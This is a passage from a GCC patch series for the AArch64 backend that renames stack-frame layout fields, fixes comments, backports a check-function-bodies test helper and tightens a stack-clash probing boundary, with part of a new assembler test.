66index a35dceab9fc..e9dad682738 100644
67--- a/gcc/config/aarch64/aarch64.c
68+++ b/gcc/config/aarch64/aarch64.c
69@@ -4771,9 +4771,11 @@ aarch64_layout_frame (void)
70 max_push_offset = 256;
71
72 HOST_WIDE_INT const_size, const_fp_offset;
73- if (cfun->machine->frame.frame_size.is_constant (&const_size)
74- && const_size < max_push_offset
75- && known_eq (crtl->outgoing_args_size, 0))
76+ if (cfun->machine->frame.saved_regs_size == 0)
77+ cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
78+ else if (cfun->machine->frame.frame_size.is_constant (&const_size)
79+ && const_size < max_push_offset
80+ && known_eq (crtl->outgoing_args_size, 0))
81 {
82 /* Simple, small frame with no outgoing arguments:
83 stp reg1, reg2, [sp, -frame_size]!
84--
852.34.1
86
87
88From 347487fffa0266d43bf18f1f91878410881f596e Mon Sep 17 00:00:00 2001
89From: Richard Sandiford <richard.sandiford@arm.com>
90Date: Fri, 16 Jun 2023 16:55:12 +0100
91Subject: [PATCH 02/10] aarch64: Add bytes_below_hard_fp to frame info
92
93The frame layout code currently hard-codes the assumption that
94the number of bytes below the saved registers is equal to the
95size of the outgoing arguments. This patch abstracts that
96value into a new field of aarch64_frame.
97
98gcc/
99 * config/aarch64/aarch64.h (aarch64_frame::bytes_below_hard_fp): New
100 field.
101 * config/aarch64/aarch64.c (aarch64_layout_frame): Initialize it,
102 and use it instead of crtl->outgoing_args_size.
103 (aarch64_get_separate_components): Use bytes_below_hard_fp instead
104 of outgoing_args_size.
105 (aarch64_process_components): Likewise.
106---
107 gcc/config/aarch64/aarch64.c | 50 +++++++++++++++++++-----------------
108 gcc/config/aarch64/aarch64.h | 6 ++++-
109 2 files changed, 32 insertions(+), 24 deletions(-)
110
111diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
112index e9dad682738..25cf10cc4b9 100644
113--- a/gcc/config/aarch64/aarch64.c
114+++ b/gcc/config/aarch64/aarch64.c
115@@ -4684,6 +4684,8 @@ aarch64_layout_frame (void)
116 last_fp_reg = regno;
117 }
118
119+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
120+
121 if (cfun->machine->frame.emit_frame_chain)
122 {
123 /* FP and LR are placed in the linkage record. */
124@@ -4751,11 +4753,11 @@ aarch64_layout_frame (void)
125 STACK_BOUNDARY / BITS_PER_UNIT);
126
127 /* Both these values are already aligned. */
128- gcc_assert (multiple_p (crtl->outgoing_args_size,
129+ gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
130 STACK_BOUNDARY / BITS_PER_UNIT));
131 cfun->machine->frame.frame_size
132 = (cfun->machine->frame.hard_fp_offset
133- + crtl->outgoing_args_size);
134+ + cfun->machine->frame.bytes_below_hard_fp);
135
136 cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
137
138@@ -4775,23 +4777,23 @@ aarch64_layout_frame (void)
139 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
140 else if (cfun->machine->frame.frame_size.is_constant (&const_size)
141 && const_size < max_push_offset
142- && known_eq (crtl->outgoing_args_size, 0))
143+ && known_eq (cfun->machine->frame.bytes_below_hard_fp, 0))
144 {
145- /* Simple, small frame with no outgoing arguments:
146+ /* Simple, small frame with no data below the saved registers.
147 stp reg1, reg2, [sp, -frame_size]!
148 stp reg3, reg4, [sp, 16] */
149 cfun->machine->frame.callee_adjust = const_size;
150 }
151- else if (known_lt (crtl->outgoing_args_size
152+ else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
153 + cfun->machine->frame.saved_regs_size, 512)
154 && !(cfun->calls_alloca
155 && known_lt (cfun->machine->frame.hard_fp_offset,
156 max_push_offset)))
157 {
158- /* Frame with small outgoing arguments:
159+ /* Frame with small area below the saved registers:
160 sub sp, sp, frame_size
161- stp reg1, reg2, [sp, outgoing_args_size]
162- stp reg3, reg4, [sp, outgoing_args_size + 16] */
163+ stp reg1, reg2, [sp, bytes_below_hard_fp]
164+ stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
165 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
166 cfun->machine->frame.callee_offset
167 = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
168@@ -4799,22 +4801,23 @@ aarch64_layout_frame (void)
169 else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
170 && const_fp_offset < max_push_offset)
171 {
172- /* Frame with large outgoing arguments but a small local area:
173+ /* Frame with large area below the saved registers, but with a
174+ small area above:
175 stp reg1, reg2, [sp, -hard_fp_offset]!
176 stp reg3, reg4, [sp, 16]
177- sub sp, sp, outgoing_args_size */
178+ sub sp, sp, bytes_below_hard_fp */
179 cfun->machine->frame.callee_adjust = const_fp_offset;
180 cfun->machine->frame.final_adjust
181 = cfun->machine->frame.frame_size - cfun->machine->frame.callee_adjust;
182 }
183 else
184 {
185- /* Frame with large local area and outgoing arguments using frame pointer:
186+ /* General case:
187 sub sp, sp, hard_fp_offset
188 stp x29, x30, [sp, 0]
189 add x29, sp, 0
190 stp reg3, reg4, [sp, 16]
191- sub sp, sp, outgoing_args_size */
192+ sub sp, sp, bytes_below_hard_fp */
193 cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
194 cfun->machine->frame.final_adjust
195 = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
196@@ -5243,9 +5246,11 @@ aarch64_get_separate_components (void)
197 if (aarch64_register_saved_on_entry (regno))
198 {
199 poly_int64 offset = cfun->machine->frame.reg_offset[regno];
200+
201+ /* Get the offset relative to the register we'll use. */
202 if (!frame_pointer_needed)
203- offset += cfun->machine->frame.frame_size
204- - cfun->machine->frame.hard_fp_offset;
205+ offset += cfun->machine->frame.bytes_below_hard_fp;
206+
207 /* Check that we can access the stack slot of the register with one
208 direct load with no adjustments needed. */
209 if (offset_12bit_unsigned_scaled_p (DImode, offset))
210@@ -5367,8 +5372,8 @@ aarch64_process_components (sbitmap components, bool prologue_p)
211 rtx reg = gen_rtx_REG (mode, regno);
212 poly_int64 offset = cfun->machine->frame.reg_offset[regno];
213 if (!frame_pointer_needed)
214- offset += cfun->machine->frame.frame_size
215- - cfun->machine->frame.hard_fp_offset;
216+ offset += cfun->machine->frame.bytes_below_hard_fp;
217+
218 rtx addr = plus_constant (Pmode, ptr_reg, offset);
219 rtx mem = gen_frame_mem (mode, addr);
220
221@@ -5410,8 +5415,7 @@ aarch64_process_components (sbitmap components, bool prologue_p)
222 /* REGNO2 can be saved/restored in a pair with REGNO. */
223 rtx reg2 = gen_rtx_REG (mode, regno2);
224 if (!frame_pointer_needed)
225- offset2 += cfun->machine->frame.frame_size
226- - cfun->machine->frame.hard_fp_offset;
227+ offset2 += cfun->machine->frame.bytes_below_hard_fp;
228 rtx addr2 = plus_constant (Pmode, ptr_reg, offset2);
229 rtx mem2 = gen_frame_mem (mode, addr2);
230 rtx set2 = prologue_p ? gen_rtx_SET (mem2, reg2)
231@@ -5478,10 +5482,10 @@ aarch64_stack_clash_protection_alloca_probe_range (void)
232 registers. If POLY_SIZE is not large enough to require a probe this function
233 will only adjust the stack. When allocating the stack space
234 FRAME_RELATED_P is then used to indicate if the allocation is frame related.
235- FINAL_ADJUSTMENT_P indicates whether we are allocating the outgoing
236- arguments. If we are then we ensure that any allocation larger than the ABI
237- defined buffer needs a probe so that the invariant of having a 1KB buffer is
238- maintained.
239+ FINAL_ADJUSTMENT_P indicates whether we are allocating the area below
240+ the saved registers. If we are then we ensure that any allocation
241+ larger than the ABI defined buffer needs a probe so that the
242+ invariant of having a 1KB buffer is maintained.
243
244 We emit barriers after each stack adjustment to prevent optimizations from
245 breaking the invariant that we never drop the stack more than a page. This
246@@ -5671,7 +5675,7 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
247 /* Handle any residuals. Residuals of at least MIN_PROBE_THRESHOLD have to
248 be probed. This maintains the requirement that each page is probed at
249 least once. For initial probing we probe only if the allocation is
250- more than GUARD_SIZE - buffer, and for the outgoing arguments we probe
251+ more than GUARD_SIZE - buffer, and below the saved registers we probe
252 if the amount is larger than buffer. GUARD_SIZE - buffer + buffer ==
253 GUARD_SIZE. This works that for any allocation that is large enough to
254 trigger a probe here, we'll have at least one, and if they're not large
255diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
256index af0bc3f1881..95831637ba7 100644
257--- a/gcc/config/aarch64/aarch64.h
258+++ b/gcc/config/aarch64/aarch64.h
259@@ -712,9 +712,13 @@ struct GTY (()) aarch64_frame
260 HOST_WIDE_INT saved_varargs_size;
261
262 /* The size of the saved callee-save int/FP registers. */
263-
264 HOST_WIDE_INT saved_regs_size;
265
266+ /* The number of bytes between the bottom of the static frame (the bottom
267+ of the outgoing arguments) and the hard frame pointer. This value is
268+ always a multiple of STACK_BOUNDARY. */
269+ poly_int64 bytes_below_hard_fp;
270+
271 /* Offset from the base of the frame (incomming SP) to the
272 top of the locals area. This value is always a multiple of
273 STACK_BOUNDARY. */
274--
2752.34.1
276
277
278From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
279From: Richard Sandiford <richard.sandiford@arm.com>
280Date: Tue, 27 Jun 2023 11:25:40 +0100
281Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
282MIME-Version: 1.0
283Content-Type: text/plain; charset=UTF-8
284Content-Transfer-Encoding: 8bit
285
286locals_offset was described as:
287
288 /* Offset from the base of the frame (incomming SP) to the
289 top of the locals area. This value is always a multiple of
290 STACK_BOUNDARY. */
291
292This is implicitly an “upside down” view of the frame: the incoming
293SP is at offset 0, and anything N bytes below the incoming SP is at
294offset N (rather than -N).
295
296However, reg_offset instead uses a “right way up” view; that is,
297it views offsets in address terms. Something above X is at a
298positive offset from X and something below X is at a negative
299offset from X.
300
301Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
302target-independent code views offsets in address terms too:
303locals are allocated at negative offsets to virtual_stack_vars.
304
305It seems confusing to have *_offset fields of the same structure
306using different polarities like this. This patch tries to avoid
307that by renaming locals_offset to bytes_above_locals.
308
309gcc/
310 * config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
311 (aarch64_frame::bytes_above_locals): ...this.
312 * config/aarch64/aarch64.c (aarch64_layout_frame)
313 (aarch64_initial_elimination_offset): Update accordingly.
314---
315 gcc/config/aarch64/aarch64.c | 9 +++++----
316 gcc/config/aarch64/aarch64.h | 6 +++---
317 2 files changed, 8 insertions(+), 7 deletions(-)
318
319diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
320index 25cf10cc4b9..dcaf491af42 100644
321--- a/gcc/config/aarch64/aarch64.c
322+++ b/gcc/config/aarch64/aarch64.c
323@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
324 = (cfun->machine->frame.hard_fp_offset
325 + cfun->machine->frame.bytes_below_hard_fp);
326
327- cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
328+ cfun->machine->frame.bytes_above_locals
329+ = cfun->machine->frame.saved_varargs_size;
330
331 cfun->machine->frame.initial_adjust = 0;
332 cfun->machine->frame.final_adjust = 0;
333@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
334
335 if (from == FRAME_POINTER_REGNUM)
336 return cfun->machine->frame.hard_fp_offset
337- - cfun->machine->frame.locals_offset;
338+ - cfun->machine->frame.bytes_above_locals;
339 }
340
341 if (to == STACK_POINTER_REGNUM)
342 {
343 if (from == FRAME_POINTER_REGNUM)
344- return cfun->machine->frame.frame_size
345- - cfun->machine->frame.locals_offset;
346+ return cfun->machine->frame.frame_size
347+ - cfun->machine->frame.bytes_above_locals;
348 }
349
350 return cfun->machine->frame.frame_size;
351diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
352index 95831637ba7..a079a88b4f4 100644
353--- a/gcc/config/aarch64/aarch64.h
354+++ b/gcc/config/aarch64/aarch64.h
355@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
356 always a multiple of STACK_BOUNDARY. */
357 poly_int64 bytes_below_hard_fp;
358
359- /* Offset from the base of the frame (incomming SP) to the
360- top of the locals area. This value is always a multiple of
361+ /* The number of bytes between the top of the locals area and the top
362+ of the frame (the incomming SP). This value is always a multiple of
363 STACK_BOUNDARY. */
364- poly_int64 locals_offset;
365+ poly_int64 bytes_above_locals;
366
367 /* Offset from the base of the frame (incomming SP) to the
368 hard_frame_pointer. This value is always a multiple of
369--
3702.34.1
371
372
373From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
374From: Richard Sandiford <richard.sandiford@arm.com>
375Date: Tue, 27 Jun 2023 11:28:11 +0100
376Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
377MIME-Version: 1.0
378Content-Type: text/plain; charset=UTF-8
379Content-Transfer-Encoding: 8bit
380
381Similarly to the previous locals_offset patch, hard_fp_offset
382was described as:
383
384 /* Offset from the base of the frame (incomming SP) to the
385 hard_frame_pointer. This value is always a multiple of
386 STACK_BOUNDARY. */
387 poly_int64 hard_fp_offset;
388
389which again took an “upside-down” view: higher offsets meant lower
390addresses. This patch renames the field to bytes_above_hard_fp instead.
391
392gcc/
393 * config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
394 to...
395 (aarch64_frame::bytes_above_hard_fp): ...this.
396 * config/aarch64/aarch64.c (aarch64_layout_frame)
397 (aarch64_expand_prologue): Update accordingly.
398 (aarch64_initial_elimination_offset): Likewise.
399---
400 gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
401 gcc/config/aarch64/aarch64.h | 6 +++---
402 2 files changed, 14 insertions(+), 13 deletions(-)
403
404diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
405index dcaf491af42..2681e0c2bb9 100644
406--- a/gcc/config/aarch64/aarch64.c
407+++ b/gcc/config/aarch64/aarch64.c
408@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
409 HOST_WIDE_INT varargs_and_saved_regs_size
410 = offset + cfun->machine->frame.saved_varargs_size;
411
412- cfun->machine->frame.hard_fp_offset
413+ cfun->machine->frame.bytes_above_hard_fp
414 = aligned_upper_bound (varargs_and_saved_regs_size
415 + get_frame_size (),
416 STACK_BOUNDARY / BITS_PER_UNIT);
417@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
418 gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
419 STACK_BOUNDARY / BITS_PER_UNIT));
420 cfun->machine->frame.frame_size
421- = (cfun->machine->frame.hard_fp_offset
422+ = (cfun->machine->frame.bytes_above_hard_fp
423 + cfun->machine->frame.bytes_below_hard_fp);
424
425 cfun->machine->frame.bytes_above_locals
426@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
427 else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
428 + cfun->machine->frame.saved_regs_size, 512)
429 && !(cfun->calls_alloca
430- && known_lt (cfun->machine->frame.hard_fp_offset,
431+ && known_lt (cfun->machine->frame.bytes_above_hard_fp,
432 max_push_offset)))
433 {
434 /* Frame with small area below the saved registers:
435@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
436 stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
437 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
438 cfun->machine->frame.callee_offset
439- = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
440+ = cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
441 }
442- else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
443+ else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
444 && const_fp_offset < max_push_offset)
445 {
446 /* Frame with large area below the saved registers, but with a
447 small area above:
448- stp reg1, reg2, [sp, -hard_fp_offset]!
449+ stp reg1, reg2, [sp, -bytes_above_hard_fp]!
450 stp reg3, reg4, [sp, 16]
451 sub sp, sp, bytes_below_hard_fp */
452 cfun->machine->frame.callee_adjust = const_fp_offset;
453@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
454 else
455 {
456 /* General case:
457- sub sp, sp, hard_fp_offset
458+ sub sp, sp, bytes_above_hard_fp
459 stp x29, x30, [sp, 0]
460 add x29, sp, 0
461 stp reg3, reg4, [sp, 16]
462 sub sp, sp, bytes_below_hard_fp */
463- cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
464+ cfun->machine->frame.initial_adjust
465+ = cfun->machine->frame.bytes_above_hard_fp;
466 cfun->machine->frame.final_adjust
467 = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
468 }
469@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
470 if (to == HARD_FRAME_POINTER_REGNUM)
471 {
472 if (from == ARG_POINTER_REGNUM)
473- return cfun->machine->frame.hard_fp_offset;
474+ return cfun->machine->frame.bytes_above_hard_fp;
475
476 if (from == FRAME_POINTER_REGNUM)
477- return cfun->machine->frame.hard_fp_offset
478+ return cfun->machine->frame.bytes_above_hard_fp
479 - cfun->machine->frame.bytes_above_locals;
480 }
481
482diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
483index a079a88b4f4..eab6da84a02 100644
484--- a/gcc/config/aarch64/aarch64.h
485+++ b/gcc/config/aarch64/aarch64.h
486@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
487 STACK_BOUNDARY. */
488 poly_int64 bytes_above_locals;
489
490- /* Offset from the base of the frame (incomming SP) to the
491- hard_frame_pointer. This value is always a multiple of
492+ /* The number of bytes between the hard_frame_pointer and the top of
493+ the frame (the incomming SP). This value is always a multiple of
494 STACK_BOUNDARY. */
495- poly_int64 hard_fp_offset;
496+ poly_int64 bytes_above_hard_fp;
497
498 /* The size of the frame. This value is the offset from base of the
499 frame (incomming SP) to the stack_pointer. This value is always
500--
5012.34.1
502
503
504From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
505From: Richard Sandiford <richard.sandiford@arm.com>
506Date: Thu, 22 Jun 2023 22:26:30 +0100
507Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
508MIME-Version: 1.0
509Content-Type: text/plain; charset=UTF-8
510Content-Transfer-Encoding: 8bit
511
512This patch fixes another case in which a value was described with
513an “upside-down” view.
514
515gcc/
516 * config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
517---
518 gcc/config/aarch64/aarch64.h | 4 ++--
519 1 file changed, 2 insertions(+), 2 deletions(-)
520
521diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
522index eab6da84a02..7c4b65ec55b 100644
523--- a/gcc/config/aarch64/aarch64.h
524+++ b/gcc/config/aarch64/aarch64.h
525@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
526 STACK_BOUNDARY. */
527 poly_int64 bytes_above_hard_fp;
528
529- /* The size of the frame. This value is the offset from base of the
530- frame (incomming SP) to the stack_pointer. This value is always
531+ /* The size of the frame, i.e. the number of bytes between the bottom
532+ of the outgoing arguments and the incoming SP. This value is always
533 a multiple of STACK_BOUNDARY. */
534 poly_int64 frame_size;
535
536--
5372.34.1
538
539
540From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
541From: Richard Sandiford <richard.sandiford@arm.com>
542Date: Tue, 15 Aug 2023 19:05:30 +0100
543Subject: [PATCH 06/10] Backport check-function-bodies support
544
545---
546 gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
547 1 file changed, 191 insertions(+)
548
549diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
550index 35ccbc86fc0..c9af27bf47a 100644
551--- a/gcc/testsuite/lib/scanasm.exp
552+++ b/gcc/testsuite/lib/scanasm.exp
553@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
554 verbose "output_file: $output_file"
555 dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
556 }
557+
558+# Read assembly file FILENAME and store a mapping from function names
559+# to function bodies in array RESULT. FILENAME has already been uploaded
560+# locally where necessary and is known to exist.
561+
562+proc parse_function_bodies { filename result } {
563+ upvar $result up_result
564+
565+ # Regexp for the start of a function definition (name in \1).
566+ set label {^([a-zA-Z_]\S+):$}
567+
568+ # Regexp for the end of a function definition.
569+ set terminator {^\s*\.size}
570+
571+ # Regexp for lines that aren't interesting.
572+ set fluff {^\s*(?:\.|//|@|$)}
573+
574+ set fd [open $filename r]
575+ set in_function 0
576+ while { [gets $fd line] >= 0 } {
577+ if { [regexp $label $line dummy function_name] } {
578+ set in_function 1
579+ set function_body ""
580+ } elseif { $in_function } {
581+ if { [regexp $terminator $line] } {
582+ set up_result($function_name) $function_body
583+ set in_function 0
584+ } elseif { ![regexp $fluff $line] } {
585+ append function_body $line "\n"
586+ }
587+ }
588+ }
589+ close $fd
590+}
591+
592+# FUNCTIONS is an array that maps function names to function bodies.
593+# Return true if it contains a definition of function NAME and if
594+# that definition matches BODY_REGEXP.
595+
596+proc check_function_body { functions name body_regexp } {
597+ upvar $functions up_functions
598+
599+ if { ![info exists up_functions($name)] } {
600+ return 0
601+ }
602+ set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
603+ if { !$fn_res } {
604+ verbose -log "body: $body_regexp"
605+ verbose -log "against: $up_functions($name)"
606+ }
607+ return $fn_res
608+}
609+
610+# Check the implementations of functions against expected output. Used as:
611+#
612+# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
613+#
614+# See sourcebuild.texi for details.
615+
616+proc check-function-bodies { args } {
617+ if { [llength $args] < 2 } {
618+ error "too few arguments to check-function-bodies"
619+ }
620+ if { [llength $args] > 4 } {
621+ error "too many arguments to check-function-bodies"
622+ }
623+
624+ if { [llength $args] >= 3 } {
625+ set required_flags [lindex $args 2]
626+
627+ upvar 2 dg-extra-tool-flags extra_tool_flags
628+ set flags $extra_tool_flags
629+
630+ global torture_current_flags
631+ if { [info exists torture_current_flags] } {
632+ append flags " " $torture_current_flags
633+ }
634+ foreach required_flag $required_flags {
635+ switch -- $required_flag {
636+ target -
637+ xfail {
638+ error "misplaced $required_flag in check-function-bodies"
639+ }
640+ }
641+ }
642+ foreach required_flag $required_flags {
643+ if { ![regexp " $required_flag " $flags] } {
644+ return
645+ }
646+ }
647+ }
648+
649+ set xfail_all 0
650+ if { [llength $args] >= 4 } {
651+ switch [dg-process-target [lindex $args 3]] {
652+ "S" { }
653+ "N" { return }
654+ "F" { set xfail_all 1 }
655+ "P" { }
656+ }
657+ }
658+
659+ set testcase [testname-for-summary]
660+ # The name might include a list of options; extract the file name.
661+ set filename [lindex $testcase 0]
662+
663+ global srcdir
664+ set input_filename "$srcdir/$filename"
665+ set output_filename "[file rootname [file tail $filename]].s"
666+
667+ set prefix [lindex $args 0]
668+ set prefix_len [string length $prefix]
669+ set terminator [lindex $args 1]
670+ if { [string equal $terminator ""] } {
671+ set terminator "*/"
672+ }
673+ set terminator_len [string length $terminator]
674+
675+ set have_bodies 0
676+ if { [is_remote host] } {
677+ remote_upload host "$filename"
678+ }
679+ if { [file exists $output_filename] } {
680+ parse_function_bodies $output_filename functions
681+ set have_bodies 1
682+ } else {
683+ verbose -log "$testcase: output file does not exist"
684+ }
685+
686+ set count 0
687+ set function_regexp ""
688+ set label {^(\S+):$}
689+
690+ set lineno 1
691+ set fd [open $input_filename r]
692+ set in_function 0
693+ while { [gets $fd line] >= 0 } {
694+ if { [string equal -length $prefix_len $line $prefix] } {
695+ set line [string trim [string range $line $prefix_len end]]
696+ if { !$in_function } {
697+ if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
698+ line selector] } {
699+ set selector [dg-process-target $selector]
700+ } else {
701+ set selector "P"
702+ }
703+ if { ![regexp $label $line dummy function_name] } {
704+ close $fd
705+ error "check-function-bodies: line $lineno does not have a function label"
706+ }
707+ set in_function 1
708+ set function_regexp ""
709+ } elseif { [string equal $line "("] } {
710+ append function_regexp "(?:"
711+ } elseif { [string equal $line "|"] } {
712+ append function_regexp "|"
713+ } elseif { [string equal $line ")"] } {
714+ append function_regexp ")"
715+ } elseif { [string equal $line "..."] } {
716+ append function_regexp ".*"
717+ } else {
718+ append function_regexp "\t" $line "\n"
719+ }
720+ } elseif { [string equal -length $terminator_len $line $terminator] } {
721+ if { ![string equal $selector "N"] } {
722+ if { $xfail_all || [string equal $selector "F"] } {
723+ setup_xfail "*-*-*"
724+ }
725+ set testname "$testcase check-function-bodies $function_name"
726+ if { !$have_bodies } {
727+ unresolved $testname
728+ } elseif { [check_function_body functions $function_name \
729+ $function_regexp] } {
730+ pass $testname
731+ } else {
732+ fail $testname
733+ }
734+ }
735+ set in_function 0
736+ incr count
737+ }
738+ incr lineno
739+ }
740+ close $fd
741+ if { $in_function } {
742+ error "check-function-bodies: missing \"$terminator\""
743+ }
744+ if { $count == 0 } {
745+ error "check-function-bodies: no matches found"
746+ }
747+}
748--
7492.34.1
750
751
752From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
753From: Richard Sandiford <richard.sandiford@arm.com>
754Date: Tue, 27 Jun 2023 15:11:44 +0100
755Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
756
757The AArch64 ABI says that, when stack clash protection is used,
758there can be a maximum of 1KiB of unprobed space at sp on entry
759to a function. Therefore, we need to probe when allocating
760>= guard_size - 1KiB of data (>= rather than >). This is what
761GCC does.
762
763If an allocation is exactly guard_size bytes, it is enough to allocate
764those bytes and probe once at offset 1024. It isn't possible to use a
765single probe at any other offset: higher would conmplicate later code,
766by leaving more unprobed space than usual, while lower would risk
767leaving an entire page unprobed. For simplicity, the code probes all
768allocations at offset 1024.
769
770Some register saves also act as probes. If we need to allocate
771more space below the last such register save probe, we need to
772probe the allocation if it is > 1KiB. Again, this allocation is
773then sometimes (but not always) probed at offset 1024. This sort of
774allocation is currently only used for outgoing arguments, which are
775rarely this big.
776
777However, the code also probed if this final outgoing-arguments
778allocation was == 1KiB, rather than just > 1KiB. This isn't
779necessary, since the register save then probes at offset 1024
780as required. Continuing to probe allocations of exactly 1KiB
781would complicate later patches.
782
783gcc/
784 * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
785 Don't probe final allocations that are exactly 1KiB in size (after
786 unprobed space above the final allocation has been deducted).
787
788gcc/testsuite/
789 * gcc.target/aarch64/stack-check-prologue-17.c: New test.
790---
791 gcc/config/aarch64/aarch64.c | 6 +-
792 .../aarch64/stack-check-prologue-17.c | 55 +++++++++++++++++++
793 2 files changed, 60 insertions(+), 1 deletion(-)
794 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
795
796diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
797index 2681e0c2bb9..4c9e11cd7cf 100644
798--- a/gcc/config/aarch64/aarch64.c
799+++ b/gcc/config/aarch64/aarch64.c
800@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
801 HOST_WIDE_INT guard_size
802 = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
803 HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
804+ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
805+ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
806 /* When doing the final adjustment for the outgoing argument size we can't
807 assume that LR was saved at position 0. So subtract it's offset from the
808 ABI safe buffer so that we don't accidentally allow an adjustment that
809@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
810 probing. */
811 HOST_WIDE_INT min_probe_threshold
812 = final_adjustment_p
813- ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
814+ ? (guard_used_by_caller
815+ + byte_sp_alignment
816+ - cfun->machine->frame.reg_offset[LR_REGNUM])
817 : guard_size - guard_used_by_caller;
818
819 poly_int64 frame_size = cfun->machine->frame.frame_size;
820diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
821new file mode 100644
822index 00000000000..0d8a25d73a2
823--- /dev/null
824+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
825@@ -0,0 +1,55 @@
826+/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
827+/* { dg-final { check-function-bodies "**" "" } } */
828+
829+void f(int, ...);
830+void g();
831+
832+/*
833+** test1:
834+** ...
835+** str x30, \[sp\]
836+** sub sp, sp, #1024
837+** cbnz w0, .*
838+** bl g
839+** ...
840+*/
841+int test1(int z) {
842+ __uint128_t x = 0;
843+ int y[0x400];
844+ if (z)
845+ {
846+ f(0, 0, 0, 0, 0, 0, 0, &y,
847+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
848+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
849+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
850+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
851+ }
852+ g();
853+ return 1;
854+}
855+
856+/*
857+** test2:
858+** ...
859+** str x30, \[sp\]
860+** sub sp, sp, #1040
861+** str xzr, \[sp\]
862+** cbnz w0, .*
863+** bl g
864+** ...
865+*/
866+int test2(int z) {
